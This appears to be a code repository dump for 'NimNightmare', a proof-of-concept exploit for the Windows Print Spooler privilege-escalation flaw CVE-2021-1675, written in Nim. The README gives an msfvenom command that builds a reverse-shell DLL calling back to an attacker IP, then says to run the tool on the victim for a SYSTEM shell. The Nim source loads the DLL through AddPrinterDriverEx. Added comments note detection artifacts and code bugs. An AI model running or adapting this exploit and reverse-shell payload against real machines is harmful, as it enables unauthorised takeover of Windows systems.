├── img.png
├── make.ps1
├── README.md
└── nimnightmare.nim

/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eversinc33/NimNightmare/HEAD/img.png
--------------------------------------------------------------------------------

/make.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eversinc33/NimNightmare/HEAD/make.ps1
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# CVE-2021-1675 LPE PoC

not my exploit! just wanted to play around with the `winim` library in nim.

### Usage

Generate DLL payload with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll`, then start the handler on your attacker.

On the victim run `.\nimnightmare.exe ` and get a shell as SYSTEM.

![](./img.png)
--------------------------------------------------------------------------------

/nimnightmare.nim:
--------------------------------------------------------------------------------
# NimNightmare: proof of concept for CVE-2021-1675 (Print Spooler local
# privilege escalation) written against the winim Win32 bindings.
# Flow, as the calls below show: enumerate an installed driver with
# EnumPrinterDrivers, reuse its pDriverPath, then register a new driver via
# AddPrinterDriverEx whose pConfigFile/pDataFile point at the DLL path given
# as the single command-line argument.
# Defender notes: the observable pattern is a non-admin process calling
# AddPrinterDriverEx with a user-writable DLL as config/data file; the
# spooler's driver-install logging and new files appearing under its driver
# directory are the artifacts to monitor, and the vendor patch / restricting
# driver installation to administrators is the mitigation.
import winim
import strformat
import os
import bitops

# NOTE(review): this only prints usage; there is no quit() here, so with no
# argument the paramStr(1) call below is still reached and raises.
# The usage string appears to have lost its argument placeholder.
if paramCount() != 1:
  echo "usage: nightmare.exe "

var
  dll_path = paramStr(1)    # caller-supplied DLL path; becomes pConfigFile/pDataFile
  info: DRIVER_INFO_2       # the driver record handed to AddPrinterDriverEx
  pcbNeeded: DWORD          # byte size the spooler reports for the driver list
  numDriversExist: DWORD    # number of DRIVER_INFO_2 entries the spooler reports

# get required bytes for driver info in pcbNeeded
# (level 2, environment "Windows x64", NULL buffer of size 0: a sizing call only)
EnumPrinterDrivers(NULL, "Windows x64", 2, NULL, 0, `&`pcbNeeded, `&`numDriversExist)

# allocate buffer for driver info
# NOTE(review): never dealloc'ed anywhere in this file; the process exits
# shortly after, so it only matters if this is ever turned into a routine.
var pDriverInfo = create(BYTE, pcbNeeded)

# save driver info into pDriverInfo
let status = EnumPrinterDrivers(NULL, "Windows x64", 2, pDriverInfo, pcbNeeded, `&`pcbNeeded, `&`numDriversExist)

# The script accepts exactly 1 as success; anything else aborts.
# (The API is documented as returning a nonzero BOOL on success, so any other
# nonzero value would be misreported here -- confirm against winim's binding.)
if status != 1:
  echo "[!] Could not find current printer drivers"
  quit(1)

# reinterpret the raw buffer as the first DRIVER_INFO_2 entry;
# only this first entry is ever read
var driverInfo = cast[ptr DRIVER_INFO_2](pDriverInfo)

echo fmt"[*] using DriverPath: {driverInfo.pDriverPath}"

# Build the new driver record: a legitimate driver binary (pDriverPath copied
# from the enumerated driver) paired with the caller's DLL as config/data file.
info.cVersion = 3
info.pConfigFile = dll_path
info.pDataFile = dll_path
# for winsrv2008 the driverpath is C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_neutral_4616c3de1949be6d\\Amd64\\UNIDRV.DLL
info.pDriverPath = driverInfo.pDriverPath
info.pEnvironment = "Windows x64"
info.pName = T"NimDriver"

echo "[*] Load DLL to driver path..."
# Level-2 record. Flags: APD_COPY_ALL_FILES plus two bare constants --
# presumably APD_COPY_FROM_DIRECTORY (0x10) and APD_INSTALL_WARNED_DRIVER
# (0x8000); confirm against winspool.h and use the named constants.
let success = AddPrinterDriverEx(NULL, 2, cast[PBYTE](`&`info), bitor(APD_COPY_ALL_FILES, 0x10, 0x8000))

# Only the "driver blocked" outcome is distinguished; every other return
# value, including other failure codes, falls into the ":)" branch.
if success == ERROR_PRINTER_DRIVER_BLOCKED:
  echo ":/"
else:
  echo ":)"
--------------------------------------------------------------------------------